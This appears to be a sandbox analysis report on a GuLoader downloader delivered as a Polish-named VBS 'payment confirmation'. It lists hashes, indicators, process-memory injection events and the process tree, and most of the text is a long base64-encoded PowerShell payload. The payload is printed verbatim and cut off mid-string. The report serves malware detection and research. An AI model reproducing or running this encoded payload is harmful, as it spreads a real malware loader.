guloader | 261fd97d96d213ebbb0add61ced1a5e913389078a52d4bd1036203f16cd11981

General

Target

potwierdzenie wpłaty-021784.vbs
Size

188KB
MD5

68551303b71795b507434b77679f5796
SHA1

c198cb2cc41fbb62e3993bbff7d5931403cab2ed
SHA256

261fd97d96d213ebbb0add61ced1a5e913389078a52d4bd1036203f16cd11981
SHA512

a33cbdb1d9a62b5f00634bf1e974fc209d01ac0bb8a21a9cafaedc867975d4681e1bf7c4a7edba8c16c67fb334e0116cb3d58ef9b760339307f527f434a7c660
SSDEEP

3072:FyBpnpcufxKYM6++ct//47uJQ+xNIga/v5GycoOEPQfevM8K4Ec5C+O8:FCn3ZKEi//WuJlIga/hGycoOEPSe3EcF

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1764	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2000	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2000	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1764 wrote to memory of 2000	1764	WScript.exe	28
PID 1764 wrote to memory of 2000	1764	WScript.exe	28
PID 1764 wrote to memory of 2000	1764	WScript.exe	28
PID 1764 wrote to memory of 2000	1764	WScript.exe	28
PID 2000 wrote to memory of 824	2000	powershell.exe	30
PID 2000 wrote to memory of 824	2000	powershell.exe	30
PID 2000 wrote to memory of 824	2000	powershell.exe	30
PID 2000 wrote to memory of 824	2000	powershell.exe	30
PID 824 wrote to memory of 584	824	csc.exe	31
PID 824 wrote to memory of 584	824	csc.exe	31
PID 824 wrote to memory of 584	824	csc.exe	31
PID 824 wrote to memory of 584	824	csc.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\potwierdzenie wpłaty-021784.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABTAGUAcgB2AGkAdAB1AHQAIAA9ACAAQAAnAA0ACgBOAGkAYwBoAGUAQQBiAGkAYQBuAG4AZABPAHgAYQBsAHUAZABPAG0AcwB0AGkALQBDAGkAYwBhAHQAVABkAGUAbAB0AGEAeQBNAGUAZABwAGwAcABFAHgAcABsAGEAZQBTAHIAawBlAG4AIABCAGEAdwBsAGUALQBUAGUAbABlAGcAVABMAGUAdgBlAGwAeQBVAGUAZwBlAG4AcABCAHUAcgBnAGUAZQBBAGYAcwBrAGkARABOAGEAdAByAG8AZQBIAHkAbQBlAG4AZgBCAGUAZwBuAGkAaQBEAGUAYwBvAG4AbgBWAGkAZABlAG8AaQBCAGwAYQBzAHQAdABFAG4AZQB0AGkAaQBLAHIAeQBkAHMAbwBUAHIAdgBlAHMAbgBIAHkAcABvAHAAIABDAGgAYQB3AHMAQABPAHYAdQBsAGEAIgAKAFQAaAB1AHIAbgB1AEEAcgBtAGEAZwBzAFUAcgBvAGcAcgBpAFYAaQBuAGQAcgBuAEYAaQByAHMAawBnAFMAdABhAHIAdAAgAEkAbgBnAHIAZQBTAFUAbgBkAGUAcgB5AEwAZQB0AG8AIABzAEYAbwBuAHQAYQB0AEIAdQBuAGoAYQBlAE0AbwBuAGkAdABtAEcAYQBkAGEAcgA7AAoAQgBvAHUAZwBhAHUAVAByAGEAbgBzAHMAQgBsAHUAZABnAGkAQQBuAGEAZwBsAG4AVgBhAG4AZAByAGcAVgBlAGQAaABmACAAQQB1AHQAbwBzAFMARgBvAHIAZQB5AHkARwByAGEAbQBtAHMASwBsAG8AcwBlAHQAQwBhAHIAbgBlAGUATQBhAGcAbgBlAG0AVAByAGEAZwBpAC4ARwB1AHQAdAB1AFIAbABlAGkAcwB0AHUARQBwAGUAbgBkAG4ARQBsAHUAcwBvAHQASgBhAG0AYQBpAGkAVgBhAHIAbQBlAG0ARgBvAHIAbABvAGUAQwBpAHIAawBlAC4AbABvAGMAdQBzAEkAVQBuAHEAdQBhAG4ASQBvAGQAYQB0AHQASQBuAGQAdgB1AGUAUwBrAHkAbABkAHIAUgBvAG0AZQBzAG8ARABpAHMAcwBpAHAARgBvAHIAcwBrAFMATQBhAHoAbwBwAGUARgBvAHUAcwBzAHIAVAB5AGwAbABlAHYARABvAG0AaQBjAGkARgBvAHIAbABvAGMAQwBvAHQAcwAgAGUAaABvAHYAZQBkAHMAQwBvAGEAdABpADsACgBEAGkAcwBlAHMAcABIAHIAaQBuAGcAdQBQAGEAbgBkAGUAYgBPAHYAZQByAHMAbABBAHQAcgBpAHUAaQBUAHUAcgBpAHMAYwBTAG4AawBzAG0AIABBAHIAZwBpAG8AcwBGAG8AcgBuAHkAdABGAHIAYQB0AGUAYQBQAHQAbwBjAGgAdABUAHkAcgBhAG4AaQBIAHkAZAByAG8AYwBQAHIAZQBwAGEAIABHAHIAZQBuAG0AYwBDAGEAdABhAG0AbABLAGwAbwBvAGYAYQBKAHUAcwB0AGkAcwBPAHYAZQByAGcAcwBBAGEAbABiAGUAIABEAGEAZgBuAGkASwBEAGkAYQBzAHQAcgBCAGUAcgBuAGEAeQBQAHIAYQBjAHQAbQBGAG8AcgBzAGkAcABWAGEAcgBlAGwAZQBDAG8AYgBzAHQAcwBVAGsAcgBhAGkAYwBEAGUAYwBlAG4AMQAKAEsAbgBpAGMAawB7AEQAbwBsAGsAZQBbAEYAdQByAGkAbABEAEEAZAB2AG8AawBsAEkAbgBzAGUAbQBsAEYAbwB3AGsAIABJAFYAaQBoAGEAcgBtAFQAbQByAGUAcgBwAEQAZQB5ACAAQQBvAEcAZQBuAG8AcAByAEcAZQBuAHQAbAB0AFMAdgBpAGQAbgAoAEYAbwByAGUAcwAiAEwAYQBuAGQAcwBrAFIAdQBsAGwAZQBlAEIAcgBlAG4AdAByAFIAZQBjAG8AbgBuAEwAaQBiAHIAYQBlAFAAcgBvAGcAcgBsAEkAbQBiAGEAcgAzAHAAcgBvAHQAbwAyAHQAZQBjAHUAbgAiAE4AbwBuAGMAbwApAEsAdQBsAHQAdQBdAEQAbwB1AHMAZQBwAFAAZQByAGkAbQB1AFMAdQByAG0AbwBiAFAAZQByAGkAawBsAFQAdQByAGMAeQBpAE0AaQBkAHkAZQBjAEkAbgBlAHgAdAAgAEEAYQByAGUAbQBzAEIAYQBnAGEAdAB0AEwAbwB2AHMAYQBhAFMAeQBtAHAAdAB0AFUAbgBrAGUAbgBpAE0AYQB0AHIAaQBjAEIAZQBhAHIAYgAgAFYAZQBuAGUAYwBlAE8AbgBkAHMAawB4AFMAZQBsAGYAIAB0AFMAcABpAHYAcwBlAEQAaQBtAGUAbgByAEEAbgB0AGkAaABuAFAAZQBhAHMAZQAgAEEAbgB0AGEAZwBpAFQAcgBlAGUAdABuAFMAYQBkACAAVwB0AFMAYwBoAGEAYQAgAFAAZQBpAG4AaQBHAFUAbgBkAGUAcgBlAFUAbgBuAGUAaQB0AHMAdQBwAGkAbgBTAFcAYQBwAGEAdAB5AEEAYwBlAHQAYQBzAEEAawB1AHQAYQB0AEUAbgBnAHIAbwBlAFMAdABpAGcAbQBtAEYAbwByAHUAcgBEAFUAZAB2AGkAawBpAEkAbgBzAHUAcgByAE8AdgBlAHIAaABlAE0AYQBsAGEAeABjAEkAbgBkAGUAawB0AFQAcgBlAGQAaQBvAEYAbwByAHUAbAByAEgAYQB1AGwAYQB5AE0AaQBzAHMAaQAoAFMAaQBuAGEAIABpAE0AZQBuAGkAbgBuAEYAbAB1AHAAaAB0AEgAdQBkAGcAZQAgAEEAYgBzAHUAbQBTAEMAbwBwAGUAcwBhAEgAZQB4AGEAZABtAEYAbwByAHIAZQBtAFMAdABvAHAAZgAsAEwAYQB0AGkAZgBpAEIAZQBuAGUAcwBuAFMAdABlAG0AbgB0AFMAeQBuAGUAYwAgAEsAdQBnAGUAbABwAGgAdgBhAGwAZQBoAE4AcgBnAGEAYQBvAGwAYQBrAG0AdQByAEsAbwBtAHAAcgBvAFcAaABpAHAAcwApAHAAZQByAGkAbgA7AAoASwBhAGsAYQBwAFsATQBlAHIAYwBhAEQAUwB0AGkAbABzAGwARgBvAHIAbQBhAGwAVQBuAGMAaQByAEkAUwB0AG8AcgBrAG0ARgBvAHIAZwBhAHAAQgByAGEAYgBhAG8ARQBzAHQAdQBhAHIAQQBpAHIAZQBkAHQAQwBoAG8AcgB1ACgARABlAHMAaQBnACIAVgBpAHQAcgBpAHUAVwBvAHIAawBiAHMAQQB3AGEAYgBhAGUATwBtAGIAbABnAHIASwBvAGUAawBrADMAQgBvAGwAaQBnADIAUAB1AG4AaQB0ACIAUwBpAG4AdQBzACkAUwB1AGIAZQByAF0AUwBhAHIAYwBvAHAAVABlAGwAZQBmAHUAUAB1AG4AZwB5AGIAQQByAGsAaQB0AGwAVQByAGUAbgBoAGkAUABlAHIAZgBvAGMARwBvAHcAbgAgACAATABlAG4AaQBuAHMATQBlAGkAbgBpAHQAWQBhAHcAbgAgAGEAUwBuAGsAZQAgAHQARQBsAHMAawBlAGkAUwB0AGUAaQByAGMAdABvAHIAYwBoACAAUABsAGUAdABoAGUAQwBpAHYAaQBsAHgAVAByAHMAawBlAHQAVgBpAGQAdQBuAGUATQBvAGQAaQBzAHIATwBwAHIAZQBnAG4AQgBvAG8AaAAgACAAUgBlAGYAcgBvAGkARABlAG0AbwBjAG4AUwBoAGEAdwB5AHQARABlAHQAZQByACAATQBlAG4AaQBuAFMASQBzAG8AcQB1AGUARABpAHAAbABvAHQAUwBhAGkAZABzAFMASwBsAGEAcwBzAGMASwBhAHAAZQBsAHIAUwBwAGgAeQBnAG8ARABlAGMAYQByAGwAUwB5AGwAdABlAGwATABhAGMAawBlAFIAaABhAGwAaQB0AGEATwB2AGUAcgBhAG4AZgByAGkAcwBlAGcAaAB5AHAAbwBwAGUATQBpAG0AaQByACgAVABvAG0AZwBhAGkASAB3AHkAIABEAG4AUwBwAG8AbABlAHQARABhAGwAcwB0ACAAQQBkAGoAdQBnAE8AUABhAHIAYQBmAHAAQgBsAG8AZABzAHIARABhAG4AYwBlAHkAQQBuAGUAbQBvAGQAUwB5AGcAZQBsAG4AUABoAGEAcwBvACwATABpAGwAbABpAGkAUAByAG8AYwBlAG4AUgBlAHMAZQBhAHQASwByAHkAcAB0ACAAUAByAGUAYwBvAFMARABhAG4AbgBlAHkATQBpAGMAcgBvAG0AQQBsAHUAbQBpACwARgBvAHIAZQBiAGkASwBvAGwAZABmAG4ASwB1AGwAZQAgAHQAUABpAGcAcwB3ACAAUABpAGIAbABvAEUARgBpAHMAYwBhAGwAQwBlAHMAcwBpAGcAZgBsAG8AcwBzAGUAUAByAGUAcgBlAHAAUwBrAHIAYQBsAGEATQBpAHUAcgB1ACwAYwBoAHUAdABuAGkAVQBkAGsAYQBzAG4AVwBhAHQAdQBzAHQAVABlAHIAcgBpACAARgBvAHIAaABhAFYAcwBiAGUAZgBhAGkAcABoAG8AdABvAGMAVwBoAGEAbABwACwAQgBhAGcAcwB0AGkAZQBsAGUAYwB0AG4AQQB2AGkAYQB0AHQASwBhAGIAZQBsACAAUwBsAGkAZABmAEYAUwB1AHIAcgBvAGwAQQBiAGEAbgBkAGEAUgBlAGcAaQB0ACkARAByAG8AbABsADsACgBGAGEAYgByAGkAWwBWAGkAdgBpAHMARABNAGkAYwByAG8AbABTAGMAaABpAHoAbABzAHQAYQBuAGQASQBCAGUAaABuAGQAbQBGAG8AbwB0AGgAcABUAG8AbgBpAGMAbwBmAGkAYQBjAHIAcgBPAHAAcwBsAHUAdABFAG4AdABhAG4AKABEAHUAcwBpAG4AIgBXAGgAYQBuAGcAawBmAGEAbgBnAHMAZQBZAGQAZQByAHYAcgBDAG8AcwBtAG8AbgBPAHIAcABpAG4AZQBOAG8AdwBoAGEAbABBAG4AeQBvAG4AMwBBAGYAcABvAGwAMgBCAGUAdABhAGkAIgBIAGUAYQB0AHIAKQBIAHUAbgBkAGUAXQBFAGwAZQBjAHQAcABTAHUAYgBqAGUAdQBCAGwAbwBrAHAAYgBDAGgAYQBuAGUAbABBAGwAbABlAHIAaQBLAGkAbABsAGkAYwBCAHIAZQBkAGwAIABCAHIAaQBnAGgAcwBKAG8AcwB0AGkAdABhAG0AcABoAGkAYQBiAHUAbABsAHcAdABJAG4AdABhAGcAaQBKAGEAbQBiAG8AYwBMAG8AbABpAGcAIABQAGwAZQBiAGUAZQBBAGYAdABvAHAAeABDAGEAcgBtAGkAdABGAGkAbgBnAGUAZQBVAG4AdwByAGkAcgBNAGkAcwBwAGEAbgBQAHIAZQBmAG8AIABLAGUAeQBlAGQAaQBMAHUAZgB0AGYAbgBTAGMAbwByAHoAdABSAG8AbABsAG8AIABTAHYAbQBtAGUAVgBNAG8AbgB1AG0AaQBGAGUAcgBpAGUAcgBwAHUAbgBkAGUAdABJAHMAdgBhAGYAdQBNAGkAcwBjAG8AYQBEAHkAbgBhAG0AbABmAGEAcgB2AGUAQQBBAG4AdABpAGMAbABTAGkAcwBrAGEAbABTAGMAbwB0AHQAbwBUAHYAcgByAGUAYwBPAHYAZQByAHQAKABBAHIAYwBoAHAAaQBBAHIAdQBzAHAAbgBPAHAAawByAHYAdABDAGgAcgBvAG0AIABHAHIAYQBmAGkAdgBUAGkAZABpAGcAMQBGAGkAbgBhAG4ALABLAG4AYQBpAGQAaQBiAHUAbQBtAGUAbgBCAG8AbABpAGcAdABBAG4AbgBhAGwAIABFAGsAcwBwAGUAdgBTAHAAYQBkAGEAMgBNAGkAcgByAG8ALABQAGwAZQBuAGUAaQBTAHYAaQBuAGUAbgBBAGkAcgBiAHUAdABTAHQAYQBkACAAIABSAGgAYQBiAGQAdgBpAG0AcABhAHMAMwBOAGEAdAB1AHIALABVAG4AYQBmAHIAaQBCAGwAawBzAHAAbgBDAGkAbgBlAHIAdABQAGwAYQBnAGUAIABSAGUAZgBlAHIAdgBCAHIAaQBsAGwANABNAHUAcgBhAG4AKQBVAG4AcgBlAGMAOwAKAFMAZQByAHYAaQBbAEMAaABlAGYAcABEAFYAbwBsAHQAbQBsAEoAZQB3AGUAbABsAE4AcwBrAGUAbABJAEMAYQBtAG8AdQBtAGcAbABpAG0AcABwAEMAdQB0AG8AYwBvAFIAZQBlAGsAcwByAEUAdQBjAGgAYQB0AFAAYQByAGEAcwAoAEMAbwBsAHUAbQAiAFMAdAByAGEAYQBrAFIAZAB0AGoAcgBlAFAAdQBrAGwAZQByAEgAZQB0AGUAcgBuAFUAbgB3AGEAcgBlAE8AYwBlAGwAbABsAFUAbgBkAGUAcgAzAFQAcgBhAGQAaQAyAFMAaQBsAHUAcgAiAFMAbwBsAG8AZQApAFMAdQBwAHAAbABdAFIAZQBjAGgAYQBwAEEAawB0AGkAdgB1AFQAZQBuAG4AaQBiAEMAbwByAHIAZQBsAGMAbwBzAG0AbwBpAFUAZAB0AHIAawBjAE4AcwBrAGUAdAAgAE4AbwBuAHQAZQBzAEYAbgBnAHMAbAB0AFUAZAByAHUAbABhAFQAZQBnAG4AcwB0AEgAeQBkAHIAYQBpAFQAdQBuAGcAZQBjAFQAaABvAHIAdQAgAHAAcgBvAHYAZQBlAFMAdQBiAGwAaQB4AEwAYQBjAGUAYgB0AEYAaQBzAHQAdQBlAFMAaQBsAGQAZQByAEYAcgBpAGsAdABuAG0AaQBzAHMAcAAgAEgAeQBwAGUAcgBpAFMAdAByAGEAbQBuAEYAZQBtAHQAbwB0AFMAbwBjAGkAYQAgAEcAaQBmAGwAZQBHAFUAZAB2AGkAcwBlAFAAaQBuAGcAIAB0AFMAdABvAGsAZQBMAEIAagBlAHIAZwBvAEQAcgBrAGkAawBjAEIAdQBsAGwAaQBhAFAAcgBlAHMAcwBsAEMAZQBsAGkAbgBlAEIAbABvAGQAcwBJAGsAdQBuAGQAZQBuAFMAawBpAGwAcwBmAFMAaQBlAHMAdABvAFMAdQBwAGUAcgAoAEQAbwByAGEAZABpAEgAbwBuAG4AcgBuAFMAcAByAGkAbgB0AEgAdQBuAGcAZQAgAEgAYQB5AGUAeQBDAEoAZQByAGIAaQBhAE0AbwBzAHQAYQBzAEYAYQBrAHUAbAB0AEIAZQBrAG8AcwBvAE8AcgBkAGUAbgAsAEQAYQB0AGEAbABpAEYAbwByAGcAcgBuAEwAaQBzAHMAZQB0AFMAZQBzAG0AYQAgAEYAbABlAHIAaQBDAFYAaQB0AGEAbQBoAEUAbgBkAG8AcwBlAGsAYQBmAGYAZQBlAEQAcgBpAGwAbAAsAEIAbABhAGEAcwBpAEMAcgB5AHAAdABuAEMAYQByAGMAYQB0AFAAcgBlAGEAbgAgAEUAcABoAGEAcwBBAFIAaQBjAG8AbABzAEkAbQBwAHIAbwBjAFMAcABlAGoAbABvAFUAbgBpAG8AbgByAFMAdABvAHAAdQAsAEkAbgB0AGUAYgBpAEQAYQB0AGEAbQBuAFIAZQB2AG8AbAB0AFMAdQBsAHAAaAAgAFMAZQBuAGEAdABMAG0AZQBzAGsAYQBlAGEAbAB1AG0AbgBlAFUAZABsAGkAZwBmAEMAbwBuAGMAYQB1AFMAdAB5AHIAZQBsAGIAZQBzAHQAZQApAE8AZgBmAHMAYwA7AAoARgBsAGUAeABpAFsAQQByAHIAYQBzAEQARABlAG4AZQB6AGwAUwB0AGUAcgBpAGwAQgBhAHQAaQBkAEkAUgB1AHQAaQBuAG0AQQBrAGsAcgBlAHAAbwByAHQAYQBsAG8AQQBuAGkAcwBvAHIATABlAG4AdABpAHQAYwBvAG4AaQBuACgARgBlAG4AZQBzACIAUwBhAG4AcABvAHcAVQBuAGQAZQByAGkAQwBpAGcAYQByAG4AQgBlAGUAbgBuAHMATgBpAHQAbgBpAHAATgBvAG4AdAByAG8AUwBtAHUAZABzAG8ARgBvAHIAbQB1AGwASwB1AGYAZgBpAC4AYwBvAHUAbgB0AGQAQgBpAGIAbABpAHIAbQBvAG8AbgBzAHYATABlAG4AYQBlACIAUwBtAG8AdABoACkAYgBsAGEAYwBrAF0AVABpAGwAYgB5AHAATQBvAG4AbwByAHUAUgBlAGcAbgBtAGIAUwBuAHkAZABlAGwATABhAGMAZQB3AGkATgBlAGcAcgBpAGMAdQBuAG0AYQBnACAATgBlAHUAcgBvAHMAVAByAG8AcwBzAHQAUwB0AGkAcgByAGEAUABhAHMAcwBhAHQARgBvAGQAcwBrAGkARwBhAHIAZABlAGMASQBuAHQAZQBtACAAQgBvAHkAbABlAGUAYgBlAG4AdABoAHgAQQBmAHYAaQBrAHQAaQBzAG8AbQB5AGUARQBuAGgAZQBkAHIASAB5AGQAcgBvAG4ATgBlAGcAcgBlACAAUwBpAHMAawBlAGkARABpAHMAcAByAG4AQQBkAG0AaQBuAHQAQQByAGsAaQB0ACAATwBwAGUAcgBhAEUASwBvAG4AcwB0AG4AVABhAGsAdABzAHUARwByAG4AcwBlAG0ATABpAHAAbwBsAEYAUAByAG8AcABvAG8AUAByAHkAcwBlAHIAVQBiAGUAcwB2AG0AcwBhAG0AcABoAHMATABhAHkAbwB1ACgAUwB3AG8AcgBkAGkAbwBwAGsAYQBzAG4ARABpAHMAYQByAHQATABvAGUAdgBlACAAVQBuAGQAaQBzAGEAVQByAGYAaQByAG4AZQBuAGcAcgBhAGsAVAByAGkAYwBrAGUAUwBrAG4AZABlAHIASQByAHIAZQBhAGYASQBsAGQAcwBwACwAUABsAGEAdABvAGkAbwBwAGcAYQB2AG4AUwB5AHMAcwBlAHQAbwByAGQAaQBuACAATQBhAGEAbABlAFIAUgBlAGQAZQB2AGUAUwBhAG0AbQBlAGgASQBuAHMAcABpAGsATgBvAG4AYQBkAGEAQgBpAGwAbABlAHMAVABhAGwAZQBiADQAUwBvAGEAcgBhADYAUgBlAHQAZQBjACwAbwByAHQAaABvAGkAUwBuAGEAawBrAG4AQQBwAHAAZQByAHQAVABoAHIAaQBmACAAcwBhAG0AbQBlAFIAYwBpAGEAcwAgAGUASwBuAGUAZQBjAGMAVQBuAGwAaQBrACwATAB5AGQAZQBuAGkAVQBuAHQAcgBpAG4ATgBpAHQAaQBkAHQAQwBvAG4AZgBvACAAVABvAHgAbwBzAEIAQwBoAGUAYwBrAGkAUwB1AHAAcABsAGwAVAB0AGgAZQBkAGUAQwBvAGwAbAB1AHYAVABlAGUAdABoAGUAVQBuAGQAZQByACwAUwBlAG0AaQBzAGkAVABhAGwAbwByAG4ASABlAG0AaQBoAHQATgBpAGMAawB5ACAARgBvAHIAZQBuAEQARgBhAGIAcgBpAGEATQBhAHIAbQBvAHQAQgBlAHMAawBqACwARgBvAHIAcwB0AGkAQgBsAGEAcwBmAG4AQQB0AHIAYQBtAHQASwB1AHYAZQByACAAUQB1AGkAcgBrAFMASwBlAHIAdAByAGEAdQBuAGQAZQByAGwAUwB5AG4AawBvAGwATwBmAGYAZQBuAHkAQwB5AGMAbABvACkAUgBvAG0AcABpADsACgBCAG8AbgBpACAAWwBPAHAAcgBpAG4ARABGAHIAaQBzAHQAbABvAG0AZwByAGUAbABCAGEAYwBrAHUASQBLAGEAbABrAHUAbQBCAGwAYQBhAGgAcABEAGUAawBsAGEAbwBUAHUAZABrAG8AcgBUAGEAYgB0AGEAdABMAGEAcwB0AHAAKAB1AGQAcwBhAGwAIgBBAHQAdAByAGEAawBIAGoAZQBtAHYAZQBLAGEAbQBnAGEAcgBNAGUAagBzAGwAbgBIAG8AbABvAGMAZQBTAHkAbgByAGgAbABTAGwAYQBnAHQAMwBDAGgAbABvAHIAMgBPAGQAbQBhAHIAIgBUAGkAbABzAHQAKQBVAG4AaQBuAHYAXQBLAG4AbwByAHQAcABSAGUAYgBvAGkAdQBLAHIAZQBzAHQAYgBUAGEAcwBoAGkAbABUAGgAbwByAGkAaQBhAGwAbABhAGcAYwBOAG8AcwB0AG8AIABzAHQAeQBtAHAAcwB0AHUAbgBnAGgAdABSAGEAYQBkAGYAYQBCAGEAZABlAGwAdABSAGUAZwBuAHMAaQBMAGEAbgBkAG0AYwBSAGUAZgBlAGMAIABTAG8AbABkAGEAZQBiAHIAbwB2AHQAeABCAGwAbwBkAHAAdABQAHIAbwBjAHQAZQBtAGEAdABlAHIAcgBzAHQAZQBuAGsAbgBPAHYAZQByAHQAIABSAGUAZgBvAHIAaQBTAHQAZQByAHMAbgBUAHIAZwBoAGUAdABMAGEAZQBvAHQAIABTAHQAZQBhAGQARwBzAHUAcgBtAGkAZQBGAHIAZQBtAHMAbgBBAGEAZwBlACAAZQBQAG8AcwBpAHQAcgBLAG8AbgB0AG8AYQBUAGgAYQBsAGEAdABEAGkAbQBtAGEAZQBBAGwAYQByAG0AQwBVAG4AcgBlAHYAbwBJAG4AZAB2AHYAbgBNAG8AbABsAGkAcwBJAG4AZgB1AHMAbwBCAGUAawBsAGEAbABCAGUAbgBlAGQAZQBTAHQAaQBnAGUAQwBTAG8AcgB0AGUAdABwAG8AbABpAGEAcgBEAGkAcwBwAGEAbABUAGUAbABhAGUARQBNAGkAbABqAGYAdgBCAGwAYQBlAG4AZQBNAHUAbAB0AGkAbgBCAGEAbABsAG8AdABJAGIAIABBAHoAKABWAGEAZwB0AGwAaQBVAGQAYgB5AGcAbgBGAGwAbwByAGkAdABTAHQAcgBpAG0AIABGAHIAYQBuAGsATwBQAGUAcgBjAG8AcABzAG8AYgByAGEAcABTAGUAbgBkAGUALABBAGYAYgByAGsAaQBNAGkAYwByAGEAbgBzAGsAYQB0AHQAdABJAG4AZAB0AHIAIABHAGEAbgBlAGwAQQBUAGEAZQBuAGQAawBJAG4AdAByAG8AcwBQAHIAbwBnAHIAZQBJAG4AdgBlAHMAYwBhAGwAYwBtAGUAKQBFAGYAdABlAHIAOwAKAFUAbgBpAHMAdABbAFUAYgBlAHMAbABEAEkAbQBtAG8AbABsAGIAbAB0AGUAcwBsAFAAcgBvAHAAbQBJAFMAaABlAHQAbABtAFMAaQBuAGcAdQBwAFUAbgBlAHIAcgBvAFMAawByAHUAcAByAHAAZQByAGkAbwB0AFAAYQBpAGMAawAoAEIAZQBzAHYAYQAiAFQAaQBtAGUAbAB3AEEAbQBpAGQAaQBpAEIAbABpAG4AZABuAEUAbABlAHYAZQBzAEYAbwByAGsAYQBwAEEAcABwAGUAbgBvAEQAeQBrAGsAZQBvAGYAcgBvAG4AdABsAEgAagB1AGwAYgAuAFIAZQBoAHkAZABkAE8AcgBkAGUAYQByAE4AbwBuAHMAdAB2AFAAbwBzAHQAbgAiAFkAZQBlACAAUwApAGgAdgBhACAAcABdAFIAbwBrAGUAcgBwAEIAdQByAHIAaQB1AEEAYgBpAGUAdABiAFUAZABkAGEAbgBsAG0AaQBkAGwAYQBpAGgAYQByAG0AZQBjAFAAcgBlAGUAbQAgAEYAYQByAG4AZQBzAEIAaQBsAGUAZAB0AFMAdQByAHIAbwBhAE4AZQB1AHIAbwB0AFYAZQBuAHQAaQBpAFIAZQBzAGgAaQBjAHQAbwBvACAAZgAgAG0AYQBpAG4AcABlAEcAYQBzAHAAZQB4AEQAaQBzAGIAYQB0AE8AbQBnAGoAbwBlAFMAcAB5AHAAcgByAFkAcAAgAEEAbgBuAE0AZQBsAGEAcwAgAFoAeQBtAG8AcwBpAEUAZgB0AGUAcgBuAFUAbAB0AHIAYQB0AEMAbwBtAHAAYQAgAEEAcwBzAGIAYQBXAEQAbwB0AHMAIABhAEsAYQBsAGUAeQBpAEMAcgBhAHcAbAB0AEcAdQBhAGkAYQBGAE0AdQBkAGQAbABvAGcAYQBiAGIAYQByAFQAaABhAGwAbABQAGEAYgByAGEAbgByAEEAbQBhAG4AdQBpAEcAYQByAGQAZQBuAE8AYgBkAHUAYwB0AGQAaQBmAGYAcgBlAEQAZQBiAGEAdAByAFMAbAB1AG0AbABDAEMAZQBsAGwAdQBoAGcAYQBzAG0AZQBhAE0AdQBsAHQAaQBuAFUAbgBzAGEAdABnAFMAdABhAGEAbABlAEQAZQBsAGEAZwAoAEwAYQBuAGQAcwBpAEUAbQBpAGcAcgBuAFMAYwBhAGwAbAB0AFYAYQBjAHUAdQAgAEUAcABpAHQAZQBUAEsAcgB5AHMAdAByAFAAbwBzAHQAZgBlAE0AaQBuAGQAcwAsAFMAdABpAGwAcABpAE0AbwBuAGUAeQBuAGkAbgBmAHIAYQB0AEoAZQBhAG4AcwAgAEEAcABoAGkAcwBHAE0AYQBrAHMAaQBlAEcAZQBuAGIAcgBkAE0AYQByAGMAZQBlAEoAdQBzAHQAbgByAEMAaABpAHIAbwBhAGYAbwByAGIAdQApAFUAbgBiAG8AdAA7AAoARgBsAGEAZwBzAFsATABhAGUAbQBvAEQARABpAG0AYQB0AGwAawBhAGYAZgBlAGwAQQBsAGwAdQBkAEkAQwBvAHIAcAB1AG0AUwBhAGQAZABlAHAAVAByAGUAcwB0AG8ARQBtAGkAdAB0AHIAQgBlAHYAaQBrAHQAQgBlAHYAaQBzACgAUwB1AHAAZQByACIAYQBuAHQAaQBzAHUAUABpAG4AYQB5AHMAQQBsAGIAYQBuAGUATABhAGsAZgBhAHIAUwB1AGcAZwBlADMASwByAGEAbgBzADIAUwBoAGkAawBhACIAQgBvAHMAcQB1ACkAVAByAGwAbABlAF0ARABlAG4AdABhAHAAUwBjAGgAZQBkAHUARQBuAGUAcgBnAGIATQB1AHMAagBpAGwAQgByAGsAagBlAGkAVQBuAGsAaQBuAGMAVABlAGEAawB0ACAAeABhAG4AdABoAHMAUgBpAG4AZwBuAHQARgBhAG4AdABvAGEAUwB1AHQAdABlAHQASgBlAG8AcABvAGkAYQBzAHQAcgBvAGMASQBuAHQAZQByACAASABqAHUAbABwAGUAUgBlAHQAcgBvAHgAVQBlAGcAbgBlAHQASwB1AG0AaQBzAGUARgBvAGwAawBlAHIAUwB0AGEAbQBhAG4AVQBpAG0AbwBkACAAUAB1AGwAdgBpAGkATQBhAGQAZABpAG4AUgBlAHMAdABpAHQATgBvAG4AZQB4ACAAVABtAG0AZQAgAFQAQQBuAG0AaQBzAG8AQQBuAHQAaQBjAFUAUwBwAG8AbgBnAG4AQwBpAHIAcgBoAGkAUwBoAGUAdABsAGMARgBvAHIAdAByAG8ATwBsAGwAaQBuAGQAUgBlAGsAdABvAGUAQgBhAGMAawBmACgAVABlAGEAcwBpAGkARwBuAGEAdABmAG4ASQBuAHQAZQB4AHQAUwBuAHkAbAB0ACAAQgByAGEAawBuAEgATQB1AHQAdQBzAGEASwBhAG0AZQByAGEAUwB0AGEAbQBmAG4AZABlAGsAbwBkAGQAUgBlAG4AdABlAHQAUAByAGUAZABpADUAVgBhAHIAaQBzADEAcgBlAGMAbwBnACwAUwB1AGYAZgBlAGkATQBhAHQAaQBuAG4AUgBlAHQAdQByAHQAQgB1AHQAdABlACAAVABpAHAAbwBsAFIAbAB5AGQAaQBzAGUAQgByAG8AbQBpAGQARABpAHMAaQBuAGUARgBvAHIAZQBuADIAQgBqAGUAcgBnADMARQBqAGUAcgBzADIAQQBmAGcAYQBuACwAYgByAGUAZABkAGkAVAByAHkAcABhAG4AUABsAGEAbgBtAHQAUwBsAG8AdQBjACAAQgByAGEAYwBoAEEAUwB0AHUAbQBwAGwAUQB1AGkAegBlAGwATABpAG0AbwBzAG8AQQBmAGwAcwB0AGkAUgBoAGUAbwB0ACwAUgBlAGsAeQBsAGkAcgBlAHQAaQBuAG4AVABoAGUAbwByAHQAUwBlAG0AaQBtACAAdQBuAHAAcgBhAFcAUwBtAG8AbwBnAGkAUwB0AG0AYQBhAG4AUQB1AGEAZ